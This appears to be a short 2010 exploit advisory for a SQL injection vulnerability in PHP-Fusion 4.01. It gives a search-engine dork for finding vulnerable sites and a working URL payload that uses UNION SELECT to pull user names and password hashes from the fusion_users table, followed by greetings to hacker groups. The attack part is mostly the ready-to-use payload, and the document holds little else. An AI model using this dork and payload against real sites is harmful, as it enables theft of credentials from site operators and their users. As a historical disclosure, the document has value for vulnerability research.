PHP-Fusion version 4.01 suffers from a remote SQL injection vulnerability.
ba36d89498159397bf49a29148591decb8226c8424a8300a73e62491065bf7a9
# Exploit Title: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities
# Date: 17/05/2010
# Author: Ma3sTr0-Dz
# Software Link: http://www.php-fusion.co.uk
# Version: 4.01
# CVE : N/A
# Code : [exploit code]
=======================================================PHP-Fusion v4.01 SQL INJECTION Vulnerabilities=======================================================############################################################## Name: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities .
# Vendor: www.php-fusion.co.uk# Date: 2010/05/17# Author: Ma3sTr0-Dz# Home : Www.Sec4ever.Com
# Contact: o5m@Hotmail.de#############################################################
# Part Expl0it & Bug Codes :
---
Dork : allinurl:readmore.php?news_id
http://site.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*
# Thanks to: Cmos_Clr -
Hard_Hakerz- Sa4D - Mahmoud_SQL - RA3CH - His0k4 - Virus_Hacker_Dz -
HCJ
g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !
_________________________________________________________________
Hotmail : une messagerie fiable avec une protection anti-spam performante
https://signup.live.com/signup.aspx?id=60969